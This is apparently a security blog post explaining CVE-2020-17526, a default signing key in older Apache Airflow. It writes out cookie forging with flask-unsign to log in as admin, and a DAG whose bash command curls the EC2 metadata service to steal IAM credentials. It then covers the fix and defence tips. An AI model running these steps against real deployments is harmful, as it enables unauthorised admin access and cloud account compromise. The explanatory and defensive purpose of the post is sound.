This is a blogpost on how a security misconfiguration within an older version of Apache Airflow could lead to an authentication bypass allowing an attacker to login as any user in the application. Once logged in, especially as an administrator, you would have access to features that could be used to execute code on the underlying server. In the case of a cloud based server, this could mean access to credentials which could allow access to the entire cloud account.
Let’s take a look at what the vulnerability is, why does it occur, how do you exploit it and what mitigations are in place in the patched version.
Apache Airflow is an open-source workflow management platform written in Python. Apart from the several server side python scripts, it has a web application essentially written in Flask that can be started from the command line as part of the airflow platform.
The web application uses Flask’s stateless, signed cookie to store and manage successful authentications. During installation a user can be created using the airflow command which in the documentation is a user with the Admin role. Any subsequent users can be created from the web interface or the command line using the airflow python script.
The bug arises due to a default security key being used to sign authentication information resulting in a security mis-configuration. When a user logs in, a cookie called session is set with the authentication information of the user in json format. A key called user_id within the json identifies which user is logged in. This json is signed with a string that is configured within the airflow.cfg configuration file. Prior to version 1.10.15 and version 2.0.2, this string was set to temporary_key. Neither the official documentation nor the installation messages said anything about changing this key.
Usage of a static known key creates an interesting problem. An attacker can create a local installation of the same version as the target, log in as an administrator and replay the session cookie to the target to login as the administrator on the remote machine.
In this case, there are tools available to decrypt and identify the plaintext json string. You can then update the user_id param and resend the cookie to the server to impersonate a user whose user_id was specified.
To attack this setup, let’s see what’s required.
When you browse to the target web application, it sets a cookie called session.
We can decrypt this to plain text using the flask-unsign tool and the following command
flask-unsign -u -c ”
Once the plaintext decryption key and the session decoded value is obtained, we can add the user_id to the json and re-sign the key using flask-unsign.
flask-unsign -s —secret “temporary_key” -c ”
Replace the session cookie in the browser using Browser Tools > Storage > Cookies (or you could use Burp proxy) and navigate to /home to login to the administrative panel.
## Post exploitation cloud compromise
As an attacker who is after the cloud account or the server on which the web application is running, additional exploitation is required. Stored cloud credentials within the web application, code execution capabilities as part of the application to search the file system or interact with instance metadata, configuration information providing SSH access to the server are some of the ways an attacker could leverage their (admin) access to pivot further.
By itself, the Airflow web interface does not have a lot of attacker friendly features. However, to become productive using the web app, administrators often install the DAGs Code Editor plugin to Airflow enabling code editing capabilities within the browser.
This allows a user to create and execute new DAGs - Directed Acyclic Graph, which is a collection of all the tasks you want to run, organized in a way that reflects their relationships and dependencies.
Use the DAGs Code Editor under the Admin menu to launch the editor. A simple DAG such as follows can be created on the server and scheduled (or triggered manually) to run.
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime
with DAG(dag_id=‘bash_dag’, schedule_interval=None, start_date=datetime(2021,1,1), catchup=False) as dag:
bash_task = BashOperator(task_id=‘bash_task’, bash_command=“curl http://169.254.169.254/latest/meta-data/“)
You can see the output of the DAG via the Graph View > Logs feature
Update the bash_command parameter using the DAGs Code Editor to fetch the name of the role attached to the EC2 instance.
Once the IAM role is obtained, update the DAG code using the DAGs Code Editor to fetch AWS credentials.
You can now configure your AWS CLI to use these credentials and access the underlying AWS cloud platform!
## Fix and defense in depth tips
CVE-2020-17526 was fixed in version 1.10.15 and 2.0.2 by removing the static string and adding b64encode(os.urandom(16)).decode(‘utf-8’) to generate a random string to be the key that the web app server would use for authentication. Additionally, the following piece of code was added to the webserver command module to shutdown the server if the key was found to be temporary_key.
From a defense in depth perspective, the following pointers will help avoid discovery and exploitation of vulnerabilities such as these
- Ensure apps and services are not unnecessarily exposed to the world. Lockdown access using Security Groups and Network Firewalls by specifying source/destination addresses for specific hosts as required.
- Ensure apps and services use secure defaults, strong passphrases, strong crypto keys and algorithms that are supported.
- Ensure vendor patches are applied and periodic patch rollouts are planned. Review the security guidelines and documentation that the vendor provides and additionally by researching security literature that talks about vulnerabilities and exploits for the specific vendor and app.
- Ensure only the required user roles are created within the app as well as on the underlying system. Do not provide extraneous privileges to the instance role attached to the EC2.
- Ensure monitoring & alerting is in place as available via the cloud provider. CloudTrail logs to a dedicated S3 bucket and CloudWatch alarms for sensitive API usage need to be in place. Use the CIS Controls for AWS and the sections for Logging and Monitoring to harden your setup.
- Use tools and processes to know what is running within your cloud infrastructure at all times. Attackers often tend to spin up machines in a region that is seldom used, for example. Visibility of what is running within your infrastructure is key to ensuring security hygiene.
Any software could become vulnerable due to poor programming, using insecure defaults or due to security mis-configurations. Apache Airflow for many versions was using a static key to sign its authentication cookie that could be generated by an attacker for any user outside the web application. A session replay using the newly generated cookie can then lead to an authentication bypass. Post exploitation scenario would include finding a vulnerability that allows code execution on the underlying server.
In the case of cloud environments this can become even more dangerous as an attacker could reach the underlying cloud platform by finding credentials on the host or accessing the instance metadata to find IAM instance role credentials. In any case a defense in depth approach is recommended to guard against attack and exploitation.
- Airflow installation document
- Apache Airflow Incorrect Session Validation in Airflow Webserver with default config
- Exploiting outdated Apache Airflow instances